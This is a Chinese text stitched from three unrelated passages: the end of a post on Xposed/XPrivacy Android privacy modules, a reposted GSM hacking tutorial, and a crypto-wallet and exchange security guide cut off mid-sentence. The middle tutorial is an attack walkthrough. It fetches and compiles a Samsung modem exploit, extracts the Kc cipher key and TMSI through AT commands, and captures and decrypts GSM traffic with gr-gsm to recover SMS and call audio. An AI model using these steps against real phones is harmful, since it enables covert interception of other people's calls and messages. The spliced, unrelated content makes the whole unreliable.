settings模块可以直接禁用程序的API接口，而不必修改APK文件。不过XPosed最大招牌还是XPrivacy 模块，阻止程序访问隐私信息。值得一题的是，XPrivacy的伪造信息的功能。美中不足就是，它不能针对每个程序伪造不同的信息。对于免费软件来说，不要要求太多了。XPosed Appsettings 可以把每个API都给你列出来，让你禁用。与Xprivacy 配合，Xposed可以控制近百个项目，甚至可以指定应用程序只能看到你选定的联系人.这种功力让人不寒而栗。XPosed 实际上实现了前文说的所有技术，是名不虚传的强中之强。另外，我的电池是1200mA的，并没感觉Xposed 多费电。上面的程序都是Hacker的作品。Hacker保护了自己的权益，也将之推广、造福大众，这是黑客文化的精髓之一。

0×00 在文章第一部分 GSM Hacking Part① ：使用SDR扫描嗅探GSM网络 搭建了嗅探GSM流量的环境，在第二部中，我们来讨论如何捕获发短信以及通话过程中的流量，从捕获到的数据中解密提取出短信文字以及通话语音。 0×01 1.1 获取三星漏洞利用代码： 这是三星的Modem interface exposed via USB通过该exp可对设备输入AT指令进行调试（此方法仅适用于：Galaxy Note 3、Galaxy S4、Galaxy S5、Galaxy S6）。 AT 即Attention,AT指令用于终端设备与PC应用之间的连接与通信。 wget https://raw.githubusercontent.com/ud2/advisories/master/android/samsung/nocve-2016-0004/usbswitcher.c 1.2 源码编译libusb： wget http://jaist.dl.sourceforge.net/project/libusb/libusb-0.1%20%28LEGACY%29/0.1.12/libusb-0.1.12.tar.gz tar zxvf libusb-0.1.12.tar.gz cd libusb-0.1.12/ ./configure make make install sudo ldconfig 1.3 gcc编译PoC: gcc usbswitcher.c -o switcher -lusb 0×02 获取Kc、TMSI参数 插入三星设备，可以在/dev/ttyACM*中找到它： 2.1 switcher busybox microcom /dev/ttyACM0 ./switcher 这一步比较尴尬，需要反复执行才能成功进入交互界面，如果实在不行可以尝试下一种方式，使用minicom： 2.2 minicom minicom -D /dev/ttyACM0 通过AT指令获取Kc\TMSI可参阅：Attacking the Baseband Modem of Mobile Phones to Breach the users’ Privacy and network Security 2.3 Kc GSM系统中的加密也只是指无线路径上的加密，防止BTS和MS之间交换客户信息和客户参数时不被非法个人或团体所得或监听，在鉴权程序中，当客户侧计算SRES三参数组的提供时，同时用另一算法(A8算法)也计算出密钥Kc。根据MSC/VLR发送出的加密命令，BTS侧和MS侧均开始使用Kc。在MS侧，由Kc、TDAM帧号和加密命令M一起经A5算法，对客户信息数据流进行加密，在无线路径上传送。在BTS侧，把从无线信道上收到加密信息数据流、TDMA帧号和Kc，再经过A5算法解密后，传送BSC和MSC。可以通过AT指令获取KC值： AT+CRSM=176.28448,0,0,9 演示视频中，Crazy Danish Hacker获得了该值为：5973237C3E96980303 丢弃最后两位，即：5973237C3E9698033 0×03 信号捕获 3.1 确定当前手机接入基站 手机在连入GSM基站时，我们可通过一些方式确定自己手机连入的是哪个基站、ARFCN是多少，安卓手机在2G状态时，可在键盘拨号界面输入 *#*#4636#*#* 上面这个是安卓通用的如果你的手机没反应，还可以尝试 Samsung (Android) : *#*#197328640#*#* or *#0011# iPhone (all) : *3001#12345#*拨号 HTC (Android) : *#*#7262626#*#* 进去以后能找到基站的MCC、MNC、ARFCN这些参数。 MCC 移动国家码 MNC Mobile Network Code，移动网络码，共2位，中国联通GSM系统使用01，中国移动GSM系统使用02 ARFCN 绝对无线频道编号（Absolute Radio Frequency Channel Number – ARFCN ），是在GSM无线系统中，用来鉴别特殊射频通道的编号方案。 手机开机后，即搜索广播控制信道（BCCH）的载频。因为系统随时都向在小区中的各用户发送出用广播控制信息。手机收集到最强的（BCCH）对应的载频频率后，读取频率校正信道（FCCH），使手机（MS）的频率与之同步。所以每一个用户的手机在不同的位置（即不同的小区）的载频是固定的，它是由GSM网络运营商组网时确定，而不是由用户的GSM手机来决定。 手机读取同步信道（SCH）的信息后找出基地站（BTS）的认别码，并同步到超高帧TDMA的帧号上。手机在处理呼叫前要读取系统的信息。如：领近小区的情况、现在所处小区的使用频率及小区是否可以使用移动系统的国家号码和网络号码等等，这些信息都以BCCH上得到。 手机在请求接入信道（RACH）上发出接入请求的信息，向系统传送SIM卡帐号等信息。系统在鉴权合格后，通过允许接入信道（AGCH）使GSM手机接入信道上并分配给GSM手机一个独立专用控制信道（SDCCH）。手机在SDCCH上完成登记。在慢速随路控制信道（SACCH）上发出控制指令。然后手机返回空闲状态，并监听BCCH和CCCH公共控制信道上的信息。 在Part 1 中937.4MHz这个基站的ARFCN为12，本部分假设我们的手机接入的是这个基站，接下来，我们通过SDR捕获这个基站的下行数据包： 3.2 确定当前基站的下行频率： 打开http://www.cellmapper.net/arfcn.php 结果： Network Type GSM (TDMA) E/U/ARFCN 12 Band Name GSM-900 Uplink Frequency 上行频率 手机到基站 (phone to base station) 892.4 MHz Downlink Frequency 下行频率 基站到手机 (base station to phone) 937.4 MHz Band Number 900 获取Downlink Frequency 下行频率 (base station to phone) ：937.4 MHz 写作：937400000 3.3捕获下行数据包： grgsm_capture.py -h linux; GNU C++ version 4.8.4; Boost_105400; UHD_003.010.git-197-g053111dc Usage: grgsm_capture.py [options] RTL-SDR capturing app of gr-gsm. Options: -h, --help show this help message and exit //打印帮助信息 -f FC, --fc=FC Set frequency [default=none] //设定捕获数据的中心频率 -a ARFCN, --arfcn=ARFCN //设定ARFCN Set ARFCN instead of frequency. In some cases you may have to provide the GSM band also -g GAIN, --gain=GAIN Set gain [default=30] //设定gain -s SAMP_RATE, --samp-rate=SAMP_RATE //设定采样率 默认2M Set samp_rate [default=2M] -p PPM, --ppm=PPM Set ppm [default=0] -b BURST_FILE, --burst-file=BURST_FILE File where the captured bursts are saved -c CFILE, --cfile=CFILE File where the captured data are saved --band=BAND Specify the GSM band for the frequency. Available bands are: P-GSM, DCS1800, PCS1900, E-GSM, R-GSM, GSM450, GSM480, GSM850. If no band is specified, it will be determined automatically, defaulting to 0. --args=ARGS Set device arguments [default=] -v, --verbose If set, the captured bursts are printed to stdout -T REC_LENGTH, --rec-length=REC_LENGTH Set length of recording in seconds [default=none] grgsm_capture.py -g 40 -a 12 -s 1000000 -c sms.cfile -T 20 -g 指定gain参数 40 -a ARFCN 12 -s 设定采样率1M -c 将捕获到的数据存入sms.cfile -T 设定时间 命令执行后可以用另外一部手机给接入ARFCN 12基站的手机打电话、发短信，这样我们就实现了捕获通话过程中的语音、短信数据包。 ls -lah sms.cfile 捕获到数据包后再次查看KC、TMSI，确定这两个数值没有改变。 0×04 信号解码 捕获完数据以后再次获取KC TMSI值： minicom -D /dev/ttyACM0 4.1 KC: AT+CRSM=176.28448,0,0,9 演示视频中输出结果为：5973237C3E96980303 丢弃最后两位，即：5973237C3E969803 4.2 TMSI: AT+CRSM=176.28542,0,0,11 演示视频中输出结果为：9062FF7632F8665610FF00 取其前4bytes,也就是前8字节，即：9062FF76 ls -lah voice.cfile 一起来看看解码脚本的用法： decode usage grgsm_decode -h Usage: grgsm_decode: [options] Options: -h, --help show this help message and exit //打印帮助信息 -m CHAN_MODE, --mode=CHAN_MODE Channel mode. Valid options are 'BCCH' (Non-combined C0), 'BCCH_SDCCH4'(Combined C0), 'SDCCH8' (Stand-alone control channel) and 'TCHF' (Traffic Channel, Full rate) -t TIMESLOT, --timeslot=TIMESLOT Timeslot to decode [default=0] -u SUBSLOT, --subslot=SUBSLOT Subslot to decode. Use in combination with channel type BCCH_SDCCH4 and SDCCH8 -b BURST_FILE, --burst-file=BURST_FILE Input file (bursts) -c CFILE, --cfile=CFILE Input file (cfile) -v, --verbose If set, the decoded messages (with frame number and count) are printed to stdout -p, --print-bursts If set, the raw bursts (with frame number and count) are printed to stdout Cfile Options: Options for decoding cfile input. -f FC, --fc=FC Frequency of cfile capture //指定需解码文件的中心频率 （从哪个频率捕获就填多少） -a ARFCN, --arfcn=ARFCN //指定ARFCN 同上，从哪个ARFCN捕获就填多少 Set ARFCN instead of frequency. In some cases you may have to provide the GSM band also --band=BAND Specify the GSM band for the frequency. Available bands are: P-GSM, DCS1800, PCS1900, E-GSM, R-GSM, GSM450, GSM480, GSM850.If no band is specified, it will be determined automatically, defaulting to 0. -s SAMP_RATE, --samp-rate=SAMP_RATE //指定采样率，默认1M Sample rate of cfile capture [default=1M] --ppm=PPM Set frequency offset correction [default=0] Decryption Options: Options for setting the A5 decryption parameters. -e A5, --a5=A5 A5 version [default=1]. A5 versions 1 - 3 supported //设定A5加密算法版本 -k KC, --kc=KC A5 session key Kc. Valid formats are //设定KC值 '0x12,0x34,0x56,0x78,0x90,0xAB,0xCD,0xEF' and '1234567890ABCDEF' TCH Options: Options for setting Traffic channel decoding parameters. -d SPEECH_CODEC, --speech-codec=SPEECH_CODEC TCH-F speech codec [default=FR]. Valid options are FR, EFR, AMR12.2, AMR10.2, AMR7.95, AMR7.4, AMR6.7, AMR5.9, AMR5.15, AMR4.75 -o SPEECH_OUTPUT_FILE, --output-tch=SPEECH_OUTPUT_FILE //将解密后的文件另存为 TCH/F speech output file [default=/tmp/speech.au.gsm]. 在接下来的解码案例中，我们以gr-gsm开源项目的测试数据为例：https://github.com/ptrkrysik/test_data 测试数据已知参数如下： ARFCN:725 采样率：$((100000000/174)) Kc:0x1E,0xF0,0x0B,0xAB,0x3B,0xAC,0x70,0x02 wget https://github.com/ptrkrysik/test_data/raw/master/vf_call6_a725_d174_g5_Kc1EF00BAB3BAC7002.cfile mv vf_call6_a725_d174_g5_Kc1EF00BAB3BAC7002.cfile test.cfile sudo wireshark -i lo grgsm_decode -a 725 -s $((100000000/174)) -m BCCH -t 0 -c test.cfile 在Immediate Assignment中，我们可以确定广播控制信道（HCCH）为： SDCCH、Timeslot:1 使用我们刚刚知道的参数再次解密： grgsm_decode -a 725 -s $((100000000/174)) -c test.cfile -m SDCCH8 -t 1 在这一步我们解码出的数据包数量比前几步少了很多，我们可以通过Ciphering Mode Command这一栏的数据包确定A5类型: A5算法在1989年由法国人开发，用于GSM系统的序列密码算法。 A5它用于对从电话到基站连接的加密，先后开发了三个版本记作A5/1、A5/2、A5/3，如果没有特别说明，通常所说的A5是指A5/1。 确定了加密算法，再次执行解密脚本： grgsm_decode -a 725 -s $((100000000/174)) -c test.cfile -m SDCCH8 -t 1 -e 1 -k 0x1E,0xF0,0x0B,0xAB,0x3B,0xAC,0x70,0x02 在cc Setup这一项，可以看到Calling party BCD number – Calling party number(被叫手机显示的主叫号码): Assignment Command一栏信息如下： 在上面这幅图中我们确定了 CHAN_MODE 为TCHF，Timeslot为5，有了这些信息，我们便能从捕获到的文件中提取出通话语音，其效果类似于通话监听： grgsm_decode -a 725 -s $((100000000/174)) -c test.cfile -m TCHF -t 5 -e 1 -k 0x1E,0xF0,0x0B,0xAB,0x3B,0xAC,0x70,0x02 -d FR -o /tmp/test.au.gsm 进入/tmp缓存目录中，已经可以发现一个音频文件了： 安装VLC播放器： sudo apt-get install vlc-nox vlc /tmp/test.au.gsm 耳机了传来歪果仁酸爽“test”的声音。解码出音频的文件：https://pan.baidu.com/s/1i5jn1A1 0×05 refer GSM Sniffing: TMSI & KC Extraction – Software Defined Radio Series #9Voice Decryption 语音解密SMS Decryption 短信解密SMS text messeges and voice calls sniffinghttps://ccdcoe.org/cycon/2015/proceedings/16_xenakis_ntantogian.pdf 原文地址：http://www.freebuf.com/articles/wireless/111577.html

安全性是至关重要的。虽然这是一个显而易见的事实，但我还是很痛苦地看到大多数普通人都缺乏安全意识。而许多专家以为每个人都对安全问题有深入的理解，然后设计或推荐一些高级功能，这些功能不仅难用，一不小心还容易搞砸了，这也让我很痛苦。安全性是一个广泛的议题，虽然在很多相关领域中我不是专家，但我目睹了许多人遇到安全问题。近期，加密货币价格上涨，市场活动越发频繁，很多新入市者又回到加密货币领域中来。在这篇文章中，我将尽我所能，使用平实易懂的语言来解释一些与持有加密货币息息相关的安全概念。它们包括：一些有关安全性的基础概念我们要/不要自行持有加密货币，应该如何持有我们要/不要在交易平台上持有加密货币，应该如何持有其它话题首先，没有任何事务是100%安全的。比方说，万一哪天真的小行星撞地球，那么无论你采用哪种储蓄方式，资金都不太可能安全吧。是的，你可以把资金存在在太空中，但这种储蓄能维持多久呢？而且如果地球都不在了，它的价值还在吗？也许到了那时候，你早已不在乎这件事了。所以，当我们说到安全性，我们其实在问这样一个问题：“这样足够安全吗？”那么我们先来定义一下“足够安全”这个概念吧。对于不同人、不同目的而言，其定义也是不同的。如果你把100美元存进消费用钱包，你可能不需要超高安全性，放进手机钱包就可以了。但是对于数百万美元，或者是关乎身家性命的钱财，你就需要采取更强大的安全保障措施了。在下文内容中，我们将探讨较大金额资金的安全保障问题。要想保障所持有的加密货币的安全，你只需要做以下3件事：防止他人窃取。防止自己丢失。找到一种资金转移方法，万一你不在了，这笔资金还可以转给你深爱的人。听起来很简单，对吧？但要真正做到这3件事是需要一定的知识、努力和智慧的，而大多数人都要么不懂，要么忽略了它们。下面我们展开来说。我们要/不要自行持有加密货币，应该如何持有“我的密钥，我的资金”。真的是这样吗？很多创世加密货币都坚持说只有自己持有加密货币才是安全的，但从未考虑这样做对普通人来说是多大的技术难题。这真的是最好的建议吗？我们现在来讨论一下这种做法。让我先问你一个问题：比特币私钥长什么样？如果你不知道，那请你继续读下去。比特币私钥长这样：KxBacM22hLi3o8W8nQFk6gpWZ6c3C2N9VAr1e3buYGpBVNZaft2p它只是一串数字和字母的组合。拥有它就能通过该地址转移比特币。还有一个概念就是“助记词”，它由12或24个英文单词按特定顺序组合而成。它们可以用来生成一系列私钥。很多钱包都使用助记词。在后续内容中，我们会使用“私钥”这一词汇，但文章提及的多数流程和相关推荐对“助记词”也同样适用。回到正题。要想保障自己持有的加密货币的安全性，你需要：防止他人获取你的私钥；防止黑客攻击，防止电脑遭受病毒和网络攻击等等。防止自己丢失私钥；对数据进行备份以防止丢失或设备损坏，并做好备份。找到一种资金转移方法，如果你不幸离世，还可以把私钥转移给你深爱的人。这一设想并不那么令人愉悦，但作为对所爱的人负责任的成年人，我们必须管理这一风险。下面让我们来仔细一一分析。防止他人获取你的私钥这是显而易见的风险。我们都听说过黑客、病毒、木马等等。我们都不想让这些东西靠近我们存放代币的地方。要充分做到这一点，我们的设备就不能连接到互联网，也不能从网上下载任何文件。这样的话，我们又能怎样以安全的方式发送和接收加密货币呢？让我们来说说可以使用的一些不同设备。计算机是其中一个选择，其通常功能也比较丰富。如果使用计算机来储存代币，那计算机就不能接入互联网，或者其它任何网络。一旦接入了网络，黑客就有可能利用操作系统或者其它应用软件的漏洞找到攻击机会。要知道，所有的软件都是有漏洞的。那么，如果计算机没有接入网络，我们又如何安装软件呢？我们可以用CD ROM或者U盘，并安装至少3种杀毒软件来确保它们是干净的。下载软件（操作系统或钱包）到U盘上，等待72小时，不断检查更新通知，确保所下载的软件或者下载软件的网站没有安全性问题。官方网站被黑、下载包被木马替换的情况非常多见。我们下载软件一定要到官方网站。另外，用开源软件也可以减少蠕虫出现几率。虽然我们自己不是程序员，但开源软件已经过其他程序员检查，蠕虫出现的概率较低。所以，操作系统我们应该使用稳定版本的Linux（而不是Windows或者Mac），并且只用开源的钱包软件。安装好所有软件和操作系统以后，我们就可以用一个干净的U盘进行交易的脱机签名。对于不同钱包而言，操作方式也不尽相同，这就不在本篇文章的探讨范围了。除了比特币，其它很多代币都没有可以进行脱机签名的钱包。同时，我们需要确保所用设备的物理安全性。因为如果有人偷了这一设备，他就可以直接进入这一设备。因此，我们要确保对硬盘进行强加密，这样即使有人拿到了硬盘，也没有办法读取它。不同操作系统有不同的加密工具。硬盘加密教程也不在本篇文章的内容范围，但在网上可以轻易找到。如果以上几件事都做好了，你可能不必再看下面的内容了。但如果你不喜欢这些，还有其它几种选项。接下来一个选项是手机。现在，因为有了沙盒设计的移动设备操作系统，非根/越狱手机要比计算机安全得多。Android系统版本太多了，没办法一一追踪， 所以我通常推荐使用iPhone 。我们应该有这样的一台手机，它仅用于钱包的安装，不用于其它任何用途。这台手机应该一直处于飞行模式，只有在进行钱包交易时才打开。我也推荐为这台手机配备单独的SIM卡，并且只用4G接入互联网。千万不要连接任何WiFi。仅在进行交易签名和软件升级时才连接到网络。如果账户里资金数额不是太大的话，这样做一般是没问题的。一些手机钱包有脱机签名功能（通过扫描二维码进行），这样从钱包App下载完成到生成私钥的过程中我们的手机完全不需要联网。这样我们就可以确保私钥从未在一台连过网的手机上存在过。这样做可以避免钱包App被蠕虫病毒入侵，或是向开发者回送数据。这些情况以前很多钱包都发生过，即便官方版本也不例外。但这样做的缺点是，我们也无法进行钱包App或者操作系统的升级。要升级软件就要在另一台手机上安装App的最新版本，将其设为飞行模式，生成一个新地址，备份（后续会讲到），然后将资金发送到新手机上。这样做很麻烦。另外，这些钱包所支持的代币/区块链数量也有限。同时，我们还需要确保手机的物理安全性。虽然最新版本的iPhone硬盘是完全加密的，但据称也有可以通过破解pin码对iPhone解锁的设备。硬件钱包我们也可以使用硬件钱包。这些设备就是为了永久保存私钥而设计的，这样就不需要进行电脑备份。交易签名也直接在硬件上进行。但不是所有东西都是100%完美的。硬件钱包也可能存在硬件、软件漏洞等。市面上有很多不同的硬件钱包。我们通常建议选择有较长历史的、品牌知名度更高的那些，因为它们经过了更多检验。两个主流的硬件钱包品牌之中，已有不同报告称其中一个一旦被黑客拿到手，就能轻易获取私钥。所以，我们一定要确保它们的物理安全性。另外，几乎所有硬件钱包都需要与计算机（或者手机）软件互动才能完成操作。所以，我们还得确保计算机是没有病毒、不受黑客攻击的。有些病毒可以在交易的最后一刻把目的地址篡改成黑客的地址。所以，我们要在设备上仔细验证交易的目的地址是否正确。即便是这样，确保计算机的安全也是必须的。有了硬件钱包，的确可以避免一些最简单的黑客窃取私钥的操作，但我还是强烈建议准备一台干净的计算机作为专用计算机，并且把防火墙功能全部打开。但总体来说，想要自行持有代币的话，硬件钱包是一个不错的选择。但它比较麻烦的是备份的保存，我们在下一节将会讲到。钱包和设备还有很多类型。我无法在此一一介绍，但以上所说都是最标准的类型了。现在我们已经探讨了如何降低（而不是消除）被他人窃取私钥的概率，那么对于如何自行持有代币这个问题，我们就已经解答1/3了。防止自己丢失密钥我们可能会遇到丢失储存代币的设备，或者设备受损的情况。因此，我们需要：备份。There are many different methods here too. Each has pros and cons.备份也有很多种方法，并且每一种都有其优缺点。但根本上来说，我们希望做到的是在不同地理位置的多重备份，并且不被他人看见（加密）。我们可以用一张纸写下来。有些使用助记词的钱包会推荐这一方式，因为写下12或24个英文单词还算比较容易。但对于私钥来说，我们很容易弄错大小写，或者字迹太潦草（比如分不清O和0），并且后续我们很难弄清楚到底是哪里出了问题。然而，用纸记还有很多更严重的问题。这些纸可能被：丢失 – 和其它纸一起弄丢了毁坏 – 被火烧了或是被洪水冲走了容易被他人读取 – 没有加密有些人把密钥纸条存进银行保险库，但因为以上原因，我通常不建议这么做。不要以为给纸条拍照（或者截图）或者把它上传到云就已经安全备份了。如果黑客攻击邮箱或者计算机，它们会轻而易举就找到你的密钥。此外，云服务商也可能对其进行多重备份，存放在不同地方，他们的员工也有可能看到这些信息。有些专门设计的金属标签可以用于助记词备份的保存。这些金属标签基本上不会被毁坏，因此大体上可以避免火烧或洪水的风险。但是，它并不能解决实体丢失或者容易被读取的问题。很多人会把金属标签存在银行保险库，并且通常和黄金和其它金属放在一块。我猜喜欢买金属产品的人很容易会这样做。如果你采用这种方法，就要了解它的局限性和风险。我推荐的做法是使用几个U盘。 但是这不需要什么技术手段（典型的“为专家而设计”谬论）。市面上有抗震/防水/防火/防磁的U盘。我们可以把加密版本的私钥备份存进几个这样的U盘，并把它们存放在不同地点（朋友家或亲戚家）。这样就解决了之前提到了所有问题了：多个地点、不容易损坏或丢失、不容易被他人读取。这样做的关键是强加密。相应的工具市面上很多，并且还会不断变得更先进。VeraCrypt就是其中一款入门级工具，加密程度还不错。它的前身TrueCrypt曾经流行过一段时间，但后来在同行评议中被发现有一些安全漏洞，因此停止开发了。所以，我们建议用户自己去了解不同产品，并为自己选出一款最好的、最新的加密工具。此外，不要给任何人你的备份，即便是加密的也不例外。另外，我们还建议每一段时间就进行一次私钥轮换（即生成新的私钥，并把资金从旧地址发送到新地址）。为深爱的人提供保障人类不能永生。因此我们需要继承/遗产计划。事实上，加密货币可以把财富传承变得更简单，并且可以减少第三方介入。同样，要做到这一点，有以下几种不同的方式：如果你使用的是低安全性的纸条或者金属标签，那么直接交给继承人就可以了。但这当然有一些潜在的缺点。他们如果太年轻或是技术水平不足，就可能会对备份保存不当。如果安全保障被他们搞砸了，黑客就可以轻而易举地通过他们窃取资金。此外，继承人还可以在任何时候带走你的资金。至于你希不希望他们这么做，就取决于你们之间的信任关系了。我强烈建议避免与他人分享私钥，无论你们之间关系多亲密。原因很简单，万一资金被取走/被盗，根本无法确定操作者是谁，或是谁保管不当，这会引起混乱。我们可以把纸条或者金属标签放进银行保险库，或者交给律师。但是，如上所说，如果哪位经手人得知了密钥，他们可以不留痕迹地取走资金。这跟律师需要到银行操作把资金转给继承人完全不同。但如果我们使用的是上面提到的U盘方法，就可以更安全地转移资金了。但这会需要更多设置步骤。有一种在线服务叫“死人键”（Deadman’s switch）。他们会定期（比如一个月）向用户发送短信/邮件，用户需要点击链接或者登陆进行回复。如果超过一定时期未回复，该账户将被视为处于“死人”状态，系统会自动按照该用户此前设定的接收人和内容一一发送邮件。我并不推荐这种服务，但大家如果感兴趣可以自行上Google了解并试用。事实上，Google自己就有这种服务。在它的众多设置中有一个选项，即用户超过3个月未登录账户的话，可以让其他人进入该账户。我个人没有试用过这一选项，所以无法评论。还请自行检验。如果你在想：“噢！太好了，我只要把密钥放进邮件里就可以传承给我的孩子了。”那请你从头再读一遍这篇文章。可能你会想，我可以把用来加密U盘的密码放进邮件里，这样我的伴侣或孩子就能进行解锁。这很接近正确做法了，但还不够。正如我们不能把密码跟互联网服务器上的备份放在一起，因为这会大大削弱备份/资金的安全性。如果你在想，那我可以打乱/加密包含了U盘密码的邮件，再另外设一个密码，告知我爱的人。这样想就对了。事实上，你不需要第二个密码。这个时候，你可以使用一种久经考验的加密工具，叫PGP (或者GPG)。PGP事实上是早期采用非对称加密（比特币也是用这一方式）的工具之一。在这里，我也不会介绍PGP使用教程，网上一搜便有。总结来说就是，让你的伴侣或孩子生成一个属于他们的PGP私钥，然后你使用他们的公钥来加密“死人”信息。这样一来，除了他们，就没有人可以读取信息内容了。这样的方式是相对安全的，但这需要他们能确保PGP私钥的安全性，并且不丢失它们。当然，他们还需要知道如何使用PGP邮件，这需要一定技术含量，而且过程还比较繁杂。如果你理解了以上建议，那么你自行持有大量加密货币的能力就已经达到基本水平（而不是高级水平）了。关于以上提及的一些问题，我们还有许多可探讨的解决方法，包括多重签名、门槛签名等等，但它们属于更高级的指南了。在下一部分，我们将探讨：使用交易平台这篇文章中的“交易平台”指的是对资金进行托管的中心化交易平台。在阅读了文章的先前部分后，你可能会说：“天呐，那真是太麻烦了。我直接把代币存到交易平台去吧。”但是，交易平台也不是没有风险的。虽然交易平台对托管资金和系统安全性负责任，但我们还是需要进行一些操作来保障我们账户的安全性。仅使用声誉好的大型交易平台交易平台存在交易对手风险。很多小型/新的交易平台刚开始可能都会制造一场退出骗局。他们会在收集用户的存款后跑路。所以，一定要远离那些“非盈利”、零交易费、高额折扣和/或返利奖励的交易平台。如果这些平台的目标不是正常获取业务收入，那么你的资金可能就是它们的唯一目标。正规的安全性保障措施需要投入大量资金，所以要求平台有可持续的商业模式。在安全性方面，不要对自己的资产敷衍了事。盈利能力强的大型交易平台不会制造退出骗局，他们没有这方面的驱动力。如果一个平台盈利能力强，商业模式可持续，拥有价值数十亿美元的业务，还有什么理由去盗窃几百万美元，然后在躲避和恐惧中生存？大型交易平台在安全性方面也经受了更多检验。是的，大型平台更加容易成为黑客的目标，这也是一种风险。但是，黑客也会以小型平台为目标，而且其中有些更容易得手。大型交易平台通常轮流和5-10个外部保安公司合作来进行渗透测试和安全性测试。保障你的账户安全在使用交易平台时，保障账户安全显然很重要。就让我们从一些基础知识说起。保障计算机的安全。通常来说， 计算机是整个安全链中最脆弱的一环。 可以的话，尽可能使用专用计算机来登陆交易账户。在计算机上安装商业杀毒软件（没错，保障安全性需要投资），并尽量减少垃圾软件的数量。把防火墙的功能全部打开。玩游戏、网上冲浪、下载等等都使用另一台计算机，并且杀毒软件、防火墙也全部打开。因为这台计算机上的病毒很有可能让黑客侵入同一网络中的其它计算机。所以，请确保这台计算机也是干净的。避免下载文件即使你并未在计算机上安装钱包，我也强烈建议不要在计算机或手机上下载任何文件。 如果有人向你发送word文件，让他们以Google doc链接的形式发送。如果发送PDF，在浏览器中用Google drive打开，而不要在计算机上打开。如果他们给你发来一个搞笑视频，让他们在视频平台上以链接形式发给你。 是的，我知道这很麻烦，但安全性保障不是免费的，资金损失也是真金白银的。在云端查看所有文件，不要下载任何东西到本地。此外，请关闭即时通讯软件的“自动保存照片和视频”功能。很多软件都有自动下载表情和视频的默认设置，这会对安全性的保障产生影响。软件要及时升级我知道，操作系统升级令人厌烦，但升级可以完善已发现的安全漏洞。黑客也会关注这些升级，并利用这些发现的漏洞来入侵那些懒于升级的用户的电脑。钱包软件或者交易平台App通常也是遵循同一模式。所以，一定要确保你所用的软件是最新版本。保障邮箱账户的安全。我推荐使用Gmail 或Protonmail账户。这两个邮件服务商总体上安全性要比其它强。 我们在其它邮件平台上看到了更多安全事故的发生。我强烈建议用户为每个交易平台创建一个专用邮件帐户，并使用一些晦涩的名字。这样一来，即使其它交易平台遭遇了安全事故，你在币安的账户也不会受到影响。这也能降低邮件钓鱼诈骗的概率。在邮件服务中开启2FA服务。我强烈建议使用Yubikey。它可以防御很多类型的黑客攻击，包括钓鱼网站等。在后面我们会讲到更多关于2FA的内容。如果你所在的国家出现过SIM卡交换诈骗，请不要绑定手机号作为邮件帐户恢复手段。我们看到很多SIM交换诈骗受害者遭受了邮件帐户密码被重置、账户被黑的后果。总体来说，我不推荐进行手机号和邮件帐户之间的绑定。请把它们分开。保障密码的安全性。给每一个平台的账户配置一个独一无二的强密码。不要害怕想不起密码。使用密码管理工具即可。对于大多数人来说，LastPass或者1Password就可以了。这两个软件都和浏览器、手机等集成得很好。两者都声称仅在本地存储密码，但在仅使用加密密码的设备之间会同步。如果想要更专业的工具，可以用KeePass，或者使用其适用于你的操作系统的版本。KeePass仅在本地存储信息。不会在设备之间进行同步，手机支持也少。它是开源的，所以不需要担心蠕虫等安全漏洞。请自行了解并选择一款适合你的工具。但不要因为“节省时间”这个理由就使用简单密码或者在所有平台都用同一个密码。一定要使用强密码，不然，你节省下来的时间可能是以大量资金损失为代价的。有了这些工具，如果你的计算机还出现病毒，那你就完蛋了。所以，请使用好的杀毒软件，并让它们保持运行。开启2FA验证。我强烈建议在创建币安账户后立即开启2FA（双因子验证）验证，如果此前没有做这件事，请现在立刻去做。因为2FA码通常存在手机中，在邮件和密码被黑时它可以提供一定程度上的保护。然而，2FA并不能提供完全的防护。例如，如果计算机病毒窃取了邮件地址和密码，通过追踪你的2FA码键盘输入，它可以继续窃取你的2FA码。再例如，如果你进入了钓鱼网站，输入了邮件地址、密码和2FA码，那么黑客就可以同时使用这些信息登陆你真正的币安账户。可能的情况有很多种，我们不能详尽列举。所以，我们还是要好好保护计算机，并且当心钓鱼网站（后续还有更多相关内容）。安装U2F。U2F是一种硬件设备，可以生成一个独一无二的基于时间、域名特定的代码。Yubikey可以说是最适合U2F的设备。（虽然很多硬件钱包也可以使用U2F，但用户体验没有那么好，需要安装App，整个操作流程也比较慢。）U2F有三大优势。第一，它基于硬件，所以存储在设备中的秘密几乎不可能被窃取。第二，它是针对特定域名的。即使你不经意进入了钓鱼网站，它也能提供保护。最后，它的使用非常简单。基于以上原因，我强烈建议大家在币安账户绑定Yubikey。针对黑客窃取资金，它能提供最好的保障措施之一。同时，也请将Yubikey与Gmail账户、LastPass和其它支持的账户进行绑定，保障这些账户的安全。停止使用短信验证。曾经有一段时间短信验证很流行。但时代已经不同了。随着SIM交换诈骗更加高发，我们建议大家不要再使用短信认证，并转换成上面提到的2FA或者U2F等验证方式。创建提现地址白名单我们强烈建议使用币安的提现白名单功能。开通后，用户可以向已认证地址快速提现，而黑客想要新增提现地址也更困难。API安全性我们很多用户使用API进行交易和提现。币安提供不同版本的API，最新版本支持非对称加密，也就是说，我们只需要知道用户的公钥。这样，用户就可以自行保留私钥，仅向我们提供公钥信息即可。我们通过公钥来确定订单所有权，并且永远不会要求获取用户私钥。请妥善保管你的私钥。如果使用交易平台，我们并不需要向自行持币那样进行API备份。如果API密钥丢失，你可以随时创建新密钥。只需确保他人并未获知你的API密钥即可。完成L2层KYC验证。保障账户安全的最佳方式之一就是完成L2层KYC验证。这样我们就能知道你的样子，并在我们的大数据风险引擎检测到账户异常时用先进的自动视频验证技术进行验证。保障手机和其它设备的实体安全一定要保障手机的安全。因为手机上可能安装了你的邮件App、Binance 